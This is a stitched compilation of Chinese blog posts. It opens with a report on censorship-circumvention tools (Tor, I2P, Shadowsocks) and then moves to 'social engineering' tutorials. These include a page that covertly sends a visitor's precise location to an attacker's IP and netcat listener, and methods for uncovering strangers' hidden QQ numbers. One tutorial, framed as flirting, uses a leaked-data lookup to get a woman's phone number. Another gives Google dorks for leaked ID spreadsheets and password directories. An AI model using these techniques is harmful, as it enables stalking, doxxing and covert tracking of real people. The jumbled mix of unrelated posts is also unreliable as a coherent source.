◇TOR + meek
TOR 在七八年前就被 GFW 封杀了。不过后来 TOR 官方提供了一个 meek 插件,可以让 TOR 客户端通过国外的计算平台间接连入 TOR 网络。
根据读者反馈,“TOR + meek”的方式【依然可用】。
关于 TOR + Meek 的使用教程,请参见:《[“如何科学上网”系列:TOR 已复活——meek 流量混淆插件的安装、优化、原理](https://program-think.blogspot.com/2014/10/gfw-tor-meek.html)》
**以下是热心读者的反馈:**
> 挪威森林猫:
> (广东联通)
> TOR + meek: 有时候连得上,有时候不行;看网页还行,看Youtube基本不行。
> 匿名:
> Tor+meek可以翻出去,tor+obfs4國殤日之前就已經掛掉
◇I2P
(从来没用过 I2P 的同学,请先看这篇《[简单扫盲 I2P 的使用](https://program-think.blogspot.com/2012/06/gfw-i2p.html)》)
前些年,每当 GFW 发飙,科学上网工具倒下一大片,I2P 通常都能屹立不倒。(就比如5年前开“十八大”的那次,当时各种工具纷纷失效,也是 I2P 一枝独秀)
这次也不例外,【I2P 依然坚挺】,实在可喜可贺!(经俺本人测试,一直可用!)
**I2P 虽然坚挺,但是速度慢。所以它适合于:【在封锁很严重的时期进行应急】。**
如果你是第一次运行 I2P,需要先进行【补种】(洋文叫做“reseed”)。补种之后,I2P 才能够接入 P2P 网络。现在封锁很严重,【如何补种】是一门艺术。下面俺会单独聊。
◇SS(ShadowSocks)及其衍生工具
俺一直没有购买 VPS 用于科学上网(主要是出于【隐匿性】的考虑),所以就没法亲自测试 SS 的情况。
前几天看到一则新闻《中国研究人员利用机器学习识别 Tor 和 Shadowsocks 流量 Solidot》。所以俺猜测:SS 的情况也不乐观 :(
如果你近期使用过 SS,欢迎在俺博客留言,反馈一下 SS 的情况。
**以下是热心读者的反馈:**
> Benny Think.:
> 一部分SS/SSR先是连不上,换端口能连上,还有一部分IP被墙彻底挂了。
> 现在SS/SSR也是苟活,速度稳定性比以前差一些。
> 匿名:
> 广东移动,GCP搭建的SS相对稳定,使用东亚的节点,延迟基本上保持在两位数。
> i Vanilla:
> Shadowsocks 等工具目前是受到了一定的影响,如果用 obfs 混淆效果可能会好些,当然这跟加密算法有关。
> V2Ray 应该是比较好用的,大家可以尝试一下。
> GFW 最近是封了一批 VPS 的 IP 段,所以无论这些 VPS 运行什么代理工具,都会无法连接。
> Unknown:
> 安徽电信,晚上连vultr的ss,无法连接,切换到移动走流量正常,速度奇快。白天连vultr,一切正常,速度忽快忽慢。
> 匿名:
> SS目前无问题。自己搭的梯子,从早期低版本到近期高版本的,还都可用
> 匿名:
> SS可用,目前5个vps有一个出问题,原因应该是网段被封了。
> 匿名:
> ss,va2y, SSR也是一片哀嚎
◇V2Ray
V2Ray 依赖于 VPS,基于前面提到原因,俺没有尝试过“基于 VPS 的科学上网”,因此也就没有亲自测试 V2Ray 的情况。
**以下是热心读者的反馈:**
> 匿名:
> 這段時間v2ray採用http混淆或者kcp模式爬牆均無大礙,psiphon變形版本也可以翻出去
> gfw.press只要及時更新節點,爬牆亦沒有問題
◇关于 VPS(Virtual Private Server)的补充说明
除了 SS,还有其它一些科学上网方法(比如自建 SSH)也依赖 VPS,所以再顺便提一下 VPS。
据俺了解到的情况,这次 GFW 加强封锁,把很多 VPS 提供商的网段都封杀了。
假如你付费的 VPS 提供商,其网段已经被 GFW 加入“IP 黑名单”,那你的 VPS 就废了(无论怎么折腾都没戏)。
**以下是热心读者的反馈:**
> cirno scarlet:
> 我用韩国的蘑菇云自建ss,原版SS,没有混淆,无任何影响;
> 大杀器昨天是激烈的IP攻防战,石斑鱼换了N多的IP地址,貌似是守下来了;
> 搬瓦工听说挂掉的极多;
> 感觉这次所谓GFW升级,实为人海战术,只要流量集中,就把相关IP墙掉。
> Unknown:
> 根据我的观察,挂掉的SS集中于搬瓦工,阿里云等知名VPS;我自己用的是新加坡的一个小众VPS,自己建的shadowsocks-liev,没开obfs,用TCP BBR加速,一直都没事。
> 匿名:
> 手上3个VPS均是SS,每个IP用几小时就会ping不通,然后换个IP继续用,ping不通的IP过一段时间也会复活,没死绝。这段时间就是这么换来换去。
> Chaos;Code
> (?_?;)辽宁联通,目前用的自搭酸酸乳,搬瓦工vps,混淆开的很高,速度还算较快,偶尔有ping不通的情况(大概一周一次?),应该是日常抽风吧(*>_<*)?,没什么大碍(???),就酱。
> 匿名:
> Goproxy-php,xxnet-php,https目录加密的php-web代理都正常使用,需要一个虚拟主机空间。
> noneme:
> 我的两个vps 都同时挂了ss ssr v2ray, 有一个被封ip了. 另一个没有问题. 都是美帝的服务器
◇热心读者的其它反馈
有些热心人的反馈,不方便归入某个类别,就统一放到这里。
> Bingyu Pan
> 现在电脑里也只有I2P坚挺,tor如果连的上,问题也不大(因为难以切断)。石斑鱼的大杀器也坚持了下来。
> 不可用的:lantern,xx net,freegate,VPN gate,psiphon,无界.
> 运营商:河南联通,安徽移动,福建电信。
★非常时期,关于科学上网的注意事项
下面是一些经验介绍,供大伙儿参考。
◇【不要】在一棵树上吊死
在严重封锁的非常时期,你手头要多准备几个科学上网的梯子。
有些缺乏经验的同学只依赖一个梯子,万一这个仅有的梯子失效了,就傻逼了。
◇确保有一个【可用的】I2P
考虑到 I2P 比较坚挺,可以在非常时期用来【救急】。当 GFW 加大封锁导致很多科学上网工具失效,这些科学上网工具也会更频繁地发布新版本,尝试突破封锁。而 I2P 的【救急】作用就体现在——用来下载其它科学上网工具的新版本。
如果你是第一次运行 I2P,或者你很久没有运行 I2P,要先进行【补种】。I2P 的补种大致有三招,分别如下:
**第1招:用其它科学上网工具给 I2P 补种**
I2P 内置了一批“补种服务器”(洋文叫“reseed server”)。很显然,这些“补种服务器”早就被 GFW 封杀了。要想通过这些“种子服务器”进行补种,需要让 I2P 通过其它科学上网工具联网。假如你手头有其它的科学上网工具,【并且还能用】,赶紧用这个工具给 I2P 补种。
启动 I2P 之后,用浏览器中访问如下网址,就可以进入【I2P 的补种界面】。
http://127.0.0.1:7657/configreseed
在这个界面上勾选“Enable HTTP Proxy”,并填写相应的“Proxy Host”和“Proxy Port”(具体填啥,取决于另一个科学上网工具提供的代理)。填写完记得点保存按钮,然后 I2P 就可以通过其它科学上网工具联网并补种。
补种完成之后,当 I2P 已经找到其它节点(界面上的 Peers 大于零),你就可以把“Enable HTTP Proxy”选项去掉——让 I2P【独立联网】。
**第2招:找其它人帮忙获取 I2P 的【种子文件】**
假设你有一个朋友手头有【可用的】I2P,那么你让这个朋友生成 I2P 的种子文件,并把种子文件发给你;然后你在自己的 I2P 补种界面上,导入这个种子文件,就可以成功补种。
【生成种子文件】的方法如下:
进入“I2P 的补种界面”,界面上有一项是【Create reseed file】。如果 I2P 已经联网,就可以通过这个功能,创建一个种子文件(文件中会包含可用的 I2P 节点的信息)。这个种子文件可以分享给其他 I2P 的使用者。
【导入种子文件】的方法如下:
进入“I2P 的补种界面”,界面上有一项是【Reseed from file】,用来导入种子文件。只要导入的种子文件【足够新鲜】,就可以让无法联网的 I2P 重新联网。
补充说明:
种子文件是有【时效性】滴。越久以前创建的种子文件,时效性越差。因为 I2P 网络的节点是在不断变化的——很早以前创建的种子文件,其中包含的节点信息可能已经过时了。一般来说,一两天之内的种子文件,是“新鲜”的;而超过一周的种子文件,就“不新鲜”了。
**第3招:通过 BT sync(Resilio Sync)获得 I2P 的【种子文件】**
如果你既没有其它可用的科学上网工具,也没有其它朋友可以帮你生成种子文件,那么你还有第三个选择——利用俺提供的 BTsync(Resilio Sync)网盘获取种子文件。
熟悉俺博客的读者应该都知道:俺提供了一个 BTsync 网盘用来分享科学上网工具。该网盘的【同步密钥】如下:
BTLZ4A4UD3PEWKPLLWEOKH3W7OQJKFPLG
上个月,俺已经在这个网盘上放了 I2P 的最新版本(0.9.31),位于 `I2P` 目录下。从昨天(10月11日)开始,俺又在上面放了几个“种子文件”(位于 `I2P` 目录下的 `seeds` 子目录)。种子文件的“文件名”是俺下载种子文件的 reseed server 的域名;种子文件的“扩展名”是 `su3`
在科学上网困难的时期,俺会尽量多更新网盘上的这批种子文件。
补充说明:
如果俺从自己的 I2P 界面上创建种子文件,这些种子文件可能会包含一些跟俺本人的网络环境相关的信息。
所以,【为了保护自己的隐匿性】,俺分享的“种子文件”是从一些【公开的】“补种服务器”下载的。为了确保种子文件的可靠性,俺使用了 I2P 界面【内置的】“补种服务器”(在“I2P 补种界面”上有这些 server 的列表)。
◇经常运行 I2P 和 BTsync
I2P 和 BT sync(Resilio Sync)都是基于 Kad(Kademlia)技术进行 P2P 联网。它们的客户端会缓存当前联网的节点信息。如果你只是【短暂关闭】它们的客户端,下次运行时,它们的客户端依然可以根据缓存的节点信息,找到互联网上的其它节点,于是就可以正常联网。
但如果你【长时间没有运行】I2P 或 BTsync,那么它们客户端缓存的节点信息就过时了(不够新鲜了),于是下次再运行时,客户端就找不到其它节点。这种情况下,就需要【重新补种】!
那么,怎样才算【长时间不运行】?根据经验,超过一周就算“长时间”。为了保险起见,至少一两天就得运行一次,以便让 I2P 或 BTsync 的客户端更新 P2P 网络的节点信息。如果有条件的话,可以让 I2P 或 BTsync 的客户端一直运行着。
◇电脑上保留一份【本博客的离线浏览】
多年前,俺就通过 BT sync 网盘分享博客的离线浏览。
在封锁很严重的时期,如果你手头保留一份【博客的离线浏览】,那么你【无需联网】就可以看俺写的那些【科学上网教程】。
要获取【本博客的离线浏览】,请使用如下【同步密钥】:
B7P64IMWOCXWEYOXIMBX6HN5MHEULFS4V
★关于【分布式】的重要性
关于【分布式】的重要性,俺已经唠叨过很多次了,比如这篇:《[“对抗专制、捍卫自由”的 N 种技术力量](https://program-think.blogspot.com/2015/08/Technology-and-Freedom.html)》
这次 GFW 加强封锁,很多科学上网工具失效,而 I2P 和 BTsync 依然可用——再次体现出【彻底无中心的 P2P】是何等重要。而且这2款工具都是基于 Kad 网络,这也说明了——**“Kad 网络”是久经考验滴!**
如果你对网络技术比较感兴趣,想知道 Kad 的原理,可以看俺前几周的博文:《[聊聊分布式散列表(DHT)的原理——以 Kademlia(Kad) 和 Chord 为例](https://program-think.blogspot.com/2017/09/Introduction-DHT-Kademlia-Chord.html)》
★科学上网教程汇总
下面这些教程都在俺博客上(需科学上网)。
再次唠叨:如果你已经用 BT sync(Resilio Sync)自动同步了【本博客的离线浏览】,无需联网就可以看这些教程。
◇基础教程
+ [如何科学上网](https://program-think.blogspot.com/2009/05/how-to-break-through-gfw.html)(传说中的全方位扫盲教程,定期更新)
+ [获取科学上网软件方法大全](https://program-think.blogspot.com/2011/03/how-to-get-gfw-tools.html)(教你在无法科学上网的情况下拿到科学上网软件)
+ [多台电脑如何共享科学上网通道](https://program-think.blogspot.com/2013/01/cross-host-use-gfw-tool.html)
+ [聊聊 GFW 如何封杀 Resilio Sync(BTSync)?以及如何【免科学上网】继续使用?](https://program-think.blogspot.com/2017/08/GFW-Resilio-Sync.html)
+ [扫盲 BT Sync——不仅是同步利器,而且是【分布式】网盘](https://program-think.blogspot.com/2015/01/BitTorrent-Sync.html)
◇各种科学上网软件使用教程
+ [简单扫盲 I2P 的使用](https://program-think.blogspot.com/2012/06/gfw-i2p.html)
+ [关于 TOR 的常见问题解答](https://program-think.blogspot.com/2013/11/tor-faq.html)
+ [扫盲 VPN Gate——分布式的 VPN 服务器](https://program-think.blogspot.com/2013/04/gfw-vpngate.html)
+ [新版本无界——赛风3失效后的另一个选择](https://program-think.blogspot.com/2011/12/gfw-wujie.html)
+ [双管齐下的赛风3](https://program-think.blogspot.com/2011/10/gfw-psiphon.html)
+ [“如何科学上网”系列:TOR 已复活——meek 流量混淆插件的安装、优化、原理](https://program-think.blogspot.com/2014/10/gfw-tor-meek.html)
+ [fqrouter——安卓系统科学上网利器(免 ROOT)](https://program-think.blogspot.com/2014/07/gfw-fqrouter.html)
+ [自由門——TOR 被封之后的另一个选择](https://program-think.blogspot.com/2010/03/choose-free-gate.html)
+ [戴“套”翻墻的方法](https://program-think.blogspot.com/2009/09/break-through-gfw-with-tor.html)
+ [扫盲 VPN 科学上网——以 Hotspot Shield 为例](https://program-think.blogspot.com/2011/09/gfw-vpn-hotspot-shield.html)
> **版权声明**
> 本博客所有的原创文章,作者皆保留版权。转载必须包含本声明,保持本文完整,并以超链接形式注明作者[编程随想](mailto:program.thinkgmail.com)和本文原始地址:
> <https://program-think.blogspot.com/2017/10/gfw-news.html>
<!--yml
category: 社会工程
date: 2022-11-10 10:28:49
-->
简单2步教你获取任意设备高精度定位-FancyPig's blog
> 来源:[https://www.iculture.cc/knowledge/pig=7971](https://www.iculture.cc/knowledge/pig=7971)
声明
以下教程仅用于学习研究目的,请勿用于非法用途
相关阅读
之前我们关于**[IP定位](https://www.iculture.cc/tag/ip%E5%AE%9A%E4%BD%8D)**的出过很多期教程了
但是很多人觉得麻烦,这次我们将再做一个简化,如何更简单的获取IP定位呢?
简介
本教程将教您通过一个页面,完成高精度定位的获取
在线体验
视频教程
图文教程
体验
点击获取定位,可以读取到精度和纬度信息
<figure class="wp-block-image size-full">![图片[1]-简单2步教你获取任意设备高精度定位-FancyPig's blog](img/e35154f10a9ecc3ba8f731edb05aff10.png)</figure>
这里会具体显示
<figure class="wp-block-image size-full">![图片[2]-简单2步教你获取任意设备高精度定位-FancyPig's blog](img/4d5f1ca3fb82b6234695be6803a9f44f.png)</figure>
但并不会传到服务器的日志
如何记录高精度定位信息
那么我们开启第26行代码,去掉`//`,然后填写您的网站路径或者是IP:端口
document.location="https://www.iculture.cc/demo/geo_result/"+ latlong;
可以通过2种方式来记录请求
* 方法一:服务器监听端口记录请求
* 方法二:服务器日志记录请求
方法一
第一种是服务端口(记得检查安全组配置是否允许该端口,以及服务器防火墙是否开启该端口)
第26行代码,例如,我想让他监听服务器的5432端口
document.location="http://39.106.66.45:5432/"+ latlong;
然后,在服务器终端中输入
nc -lvvp 5432
等待请求结果
<figure class="wp-block-image size-large">![图片[3]-简单2步教你获取任意设备高精度定位-FancyPig's blog](img/533bcddcc96ad5fa3d19ace9dd26a86e.png)</figure>
方法二
当然,如果你不会开启服务器端口,您也可以直接使用宝塔面板的日志功能,我们将重定向链接随意修改,可以是一个不存在的路径,但要在服务器的域名路径下, 第26行代码,例如
document.location="https://www.iculture.cc/demo/geo_result/"+ latlong;
然后去宝塔面板`/www/wwwlogs/`下寻找相关的日志文件,再从日志文件中查找日志详情即可(视频中有讲)
其他基础教程
如果您没有服务器,我们为您推荐
特价服务器购买
下面是一些腾讯云的活动,强烈建议选择腾讯云学生机,一年也就400多块钱(2核4G 3M带宽)
当然您也可以选择[阿里云服务器](http://iculture.cc/aliyun),或者[vultr国外服务器](https://iculture.cc/vultr)
网站搭建教程
相关代码及工具
简陋版源代码
最基本的框架已经出来了,需要美化可以自行找模板
URL编码/解码工具
下面是常用的在线URL编码解码工具
当然,您也可以使用本地离线工具
经纬度查询工具
你只需要输入获取的纬度,经度
然后用逗号隔开查询即可
美化问题
至于页面美化的问题,这个你可以随便找一个好看的页面,然后把提交按钮上加入`onclick="getLocation()"`,同时引入相关的javascript代码,非常简单!
我们这里以[乔碧萝](https://www.iculture.cc/knowledge/pig=261)之前的动漫款式为例
<figure class="wp-block-image size-full">![图片[4]-简单2步教你获取任意设备高精度定位-FancyPig's blog](img/ee5c462c3e59a3b91970b51c3fb1ff32.png)</figure>
下面讲一下美化的思路,附源码
<!--yml
category: 社会工程
date: 2022-11-10 10:28:39
-->
Osint Framework开源情报查询框架汉化版 在线工具-FancyPig's blog
> 来源:[https://www.iculture.cc/knowledge/pig=9136](https://www.iculture.cc/knowledge/pig=9136)
相关阅读
简介
上面的相关阅读中的文章其实都是基于Osint Framework(开源情报查询框架)完成的,即通过在互联网中公开的信息进行一些事件的调查,它的优势显而易见就是不会与目标主体产生接触、关联,意味着你的调查将不会被他发现,这是不是听起来蛮有意思的!
功能介绍
功能大纲包括
* 用户名搜索
* 邮箱账户搜索
* 域名搜索
* IP地址搜索
* 图片/视频/文档搜索
* 社交网站搜索
* 即时通讯
* 身份信息核实
* 约会记录查询
* 电话号码查询
* 公开档案
* 商业档案
* 交通运输
* 高精度定位/地图
* 搜索引擎玩法
* 论坛/博客/IRC
* 档案资料
* 语言翻译
* 元数据
* 手机模拟器
* 数字货币
* 分类信息
* 编码/解码
* 工具
* 恶意文件分析
* 漏洞EXP & 修复建议
* 威胁情报
* OpSec
* 文档资料
* 训练
界面截图
其实这是一个非常全面的框架,对于网络安全初学者,是一个不错的探索模式,你可以通过这个框架找到各种你想要的信息源。
再或者,你是一名记者,通过OSINT框架,你可以更快的获得一些公开情报,甚至可以完成一些取证相关的工作。
<figure class="wp-block-image size-large">![图片[1]-Osint Framework开源情报查询框架汉化版 在线工具-FancyPig's blog](img/ecd73cea5daadf9b0afdfea7ea2f0994.png)</figure>
我们举个例子,我们想找一下`fancypig`这个用户名注册过哪些社交网站,我们可以看这里,这里提供了很多相关工具
<figure class="wp-block-image size-full">![图片[2]-Osint Framework开源情报查询框架汉化版 在线工具-FancyPig's blog](img/76778afdbfb444c3a42800a98b2dd350.png)</figure>
我们选择第一个`Namechk`工具,这里会打开一个新的网站,目测这里是爬虫实现的,超过90个社交网站账户收集
<figure class="wp-block-image size-large">![图片[3]-Osint Framework开源情报查询框架汉化版 在线工具-FancyPig's blog](img/56d9817ff2606deb3d0fe2454fa3a242.png)</figure>
我们这里进行人机身份验证后,点右侧的搜索按钮,然后你就可以看到`fancypig`注册过哪些社交平台,比方说抖音TikTok
<figure class="wp-block-image size-large">![图片[4]-Osint Framework开源情报查询框架汉化版 在线工具-FancyPig's blog](img/218b48f9011ea207284c3a5115256a4a.png)</figure>
工具类型
Osint Framework下工具主要分为四种类型
* (T)代表需要在本地运行
* (D)代表是Google Dorking语法
* (R)代表需要注册才能使用
* (M)代表搜索需要单独编辑URL链接中的关键词
工具体验
请评论获取上述工具
<!--yml
category: 社会工程
date: 2022-11-10 10:28:32
-->
如何通过QQ看点获取QQ号-FancyPig's blog
> 来源:[https://www.iculture.cc/knowledge/pig=11549](https://www.iculture.cc/knowledge/pig=11549)
杂谈
最近有热心网友在群里提问,能不能在QQ看点上通过主页找到作者的QQ号呢?
之前最原始的base64解密方法已经失效了,不过还是有新的方法,甚至不需要解密😎😎😎
相关阅读
图文教程
下面的教程我们将给大家提供两种方式,第一种比较原始,第二种比较简易,选择适合你的方式!
首先,我们先找一个QQ看点的视频,emmmm,这个好像是沫子
<figure class="wp-block-image size-full is-resized">![图片[1]-如何通过QQ看点获取QQ号-FancyPig's blog](img/0a8b4e2b7c61254dcbd985eb3b095a76.png)</figure>
打开之后,我们点击沫子的头像进入主页
<figure class="wp-block-image size-full">![图片[2]-如何通过QQ看点获取QQ号-FancyPig's blog](img/2c6810b036ae756e02d019f65df513ae.png)</figure>
点击右上角**···**
<figure class="wp-block-image size-full">![图片[3]-如何通过QQ看点获取QQ号-FancyPig's blog](img/578a28e7ed55c729a1d65abda9a7abf5.png)</figure>
点击复制链接
<figure class="wp-block-image size-full">![图片[4]-如何通过QQ看点获取QQ号-FancyPig's blog](img/76303832346b8f9d4c66aad43ce18990.png)</figure>
复制链接后得到下面的内容
https://kandian.qq.com/mqq/vue/main?_wv=10145&_bid=3302&adfrom=qqshare&x5PreFetch=1&sourcefrom=6&secUin=ABGKeNaYmpGAyxwi811feC8EiA&adtag=qqshare&t=1647305394903&viola_share_url=http://viola.qq.com/js/profileV2.js?_rij_violaUrl=1&v_bid=3740&v_tid=6&v_bundleName=profileV2&hideNav=1&v_nav_immer=1&accountId=&secUin=ABGKeNaYmpGAyxwi811feC8EiA&iid=&iid=&sourcefrom=6
接下来如何使用这个链接呢?
方法一
我们分析提取`secUin=`后面到`&iid`之前的内容
<figure class="wp-block-image size-full">![图片[5]-如何通过QQ看点获取QQ号-FancyPig's blog](img/cb7005c8bd241c0c15e549be611ad9ef.png)</figure>
这里是
ABGKeNaYmpGAyxwi811feC8EiA
然后使用我们抓包时候找到的接口
https://kandian.qq.com/cgi-bin/social/getHomePage?uin=&pageSize=8&pageCookies=&isInQQ=0&tabid=0&version=0&clientType=2&secUin=
将`ABGKeNaYmpGAyxwi811feC8EiA`填到上面的`secUin=`后面,则得到
https://kandian.qq.com/cgi-bin/social/getHomePage?uin=&pageSize=8&pageCookies=&isInQQ=0&tabid=0&version=0&clientType=2&secUin=ABGKeNaYmpGAyxwi811feC8EiA
然后在`third_uin`中就可以看到沫子的QQ号了欸
<figure class="wp-block-image size-full">![图片[6]-如何通过QQ看点获取QQ号-FancyPig's blog](img/084e5b0ccc2af38ae7c1febfa91d096a.png)</figure>
然后我们去查找验证下,发现是正确的欸😊😊😊
<figure class="wp-block-image size-full">![图片[7]-如何通过QQ看点获取QQ号-FancyPig's blog](img/58898aff4d3f2a609682acf733e687f0.png)</figure>
方法二
很多热心网友表示方法一有点复杂,那我们来点简单易操作的,我们之前分享的氧化氢工具箱里面其实自带的是有的,当时是在讲IP溯源的时候提到过这个工具的
进入工具箱页面,将链接粘贴在输入框里
<figure class="wp-block-image size-large">![图片[8]-如何通过QQ看点获取QQ号-FancyPig's blog](img/ab930c34f726f04d3d23242e1776bc99.png)</figure>
然后点击查询,就可以看到结果了,这里可以一键添加好友,还是蛮香的
<figure class="wp-block-image size-large">![图片[9]-如何通过QQ看点获取QQ号-FancyPig's blog](img/1d330942b88cb1539edcdf89b492908a.png)</figure>
<!--yml
category: 社会工程
date: 2022-11-10 10:30:51
-->
通过社工的方式撩妹,你学会了吗?-FancyPig's blog
> 来源:[https://www.iculture.cc/sg/pig=219](https://www.iculture.cc/sg/pig=219)
通过社工的方式撩妹,你学会了吗?
如何社工到QQ小世界里小姐姐的联系方式?
问题场景
很多人在社交方面都比较腼腆,看到喜欢的人却迟迟不敢迈开第一步。
这里教给大家通过社工高逼格的方式入场。
声明
本教程仅用于教育目的,演示是随机的,请不要对号入座。
为了保留画面的美感,这里仅将头像和QQ、手机等敏感信息进行打码。
怎么查小世界里人的QQ
点击头像
点击举报
这里并不是真的要举报哦,只是获取链接用的
点击复制链接
链接如下,最后的`eviluin=`后面就是她的QQ了,这里为了保护隐私就隐藏了哦
https://jubao.qq.com/uniform_impeach/impeach_entry?contentid=&srv_para=&text_evidence=&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&appid=2400002&cryptograph=8b9f0c7e6a69d14a607f12280f9cbf48&system=ios&subapp=wezone_profile&version=8.5.5.648&appname=KQQ&scene=25015&theme=1&uintype=1&eviluin=小世界的QQ号在这里
搜索QQ验证
验证发现QQ号是正确的
如何通过小世界的QQ查到手机号
使用社工库
[FancyPig在线社工库](https://www.iculture.cc/qbind)
拓展思路
你拿到手机号之后,可以选择去微信里看看
然后,你的爱情就开始了,还不开来自己试试~
<!--yml
category: 社会工程
date: 2022-11-10 10:35:19
-->
常见搜索引擎Google Hacking语法整理-FancyPig's blog
> 来源:[https://www.iculture.cc/knowledge/pig=312](https://www.iculture.cc/knowledge/pig=312)
常见搜索引擎Google Hacking语法整理
杂谈
最近很多人在问搜索引擎怎么用,之前介绍过shodan/zoomeye/fofa这些高级的搜索引擎
但是我们也不能忽略百度/Google/Bing/360/搜狗,这些日常使用的搜索引擎,合理的运用语法可以帮助我们更快的检索内容
这里说下个人看法:我个人认为Google是我用过的最好的搜索引擎,毕竟搜出来的东西多
温馨提示
使用Google,需要科学上网,访问密码评论获取
信息收集
直接列出来一大堆语法会显得比较枯燥乏味,因此这里结合实例给大家做一下演示
基本逻辑
* 逻辑与:and
* 逻辑或: or
* 逻辑非: –
* 完整匹配:”关键词”
* 通配符:* ?
上面的逻辑用的比较少,这里不做说明
filetype文件类型
filetype:指定文件类型
比方说,我们想搜索一些`xls格式`的泄露身份证信息
身份证 filetype:xls
<figure class="wp-block-image"></figure>
比方说,我们想搜索一篇`pdf格式`的关于直播行业的报告
直播行业 filetype:pdf
<figure class="wp-block-image"></figure>
比方说,我们想搜索一篇`docx格式`的感谢信模板
除了上述格式,我们还可以搜索网站使用的开发语言
关键词包含
当我们搜索内容时,必须包含某个关键词时,可以使用下面的语句
XXXXX "必须包含的关键词"
比方说,我想搜索一个在机关单位上班的人,那我们可以使用下面的语句
税务局 "张三"
site指定站点
site:网站
比方说,我想搜索FancyPig’s blog下面所有涉及到社工的资料
社工 site:www.iculture.cc
比方说,我想搜索清华大学的2021招生信息
招生 site:www.tsinghua.edu.cn
<figure class="wp-block-image"></figure>
inurl指定路径
inurl:指定路径
`inurl`可以帮我们更快的找到类似路径的页面
比方说我想找到路径为admin/login.php的后台入口
inurl:admin/login.php
<figure class="wp-block-image"></figure>
intitle指定标题
intitle:指定标题
比方说我们想搜索标题为`后台登陆`的界面
intitle:后台登陆
related相似页面
related:参考网站
如果我想找一个和人民日报界面布局类似的网站
related:www.people.com.cn
<figure class="wp-block-image"></figure>
Index of
查找允许目录浏览的页面,比方说我想看看/admin目录下的文件(部分网站因为配置疏忽的原因,导致目录可以被所有人访问,目录的文件也可以被下载)
index of /admin
从上面我们可以下载到admin目录下的所有文件
与之类似的查询语句还有
* index of /passwd
* index of /password
* index of /mail
* “index of /” +passwd
* “index of /” +password.txt
* “index of /” +.htaccess
* “index of /root”
* “index of /cgi-bin”
* “index of /logs”
* “index of /config”
实战案例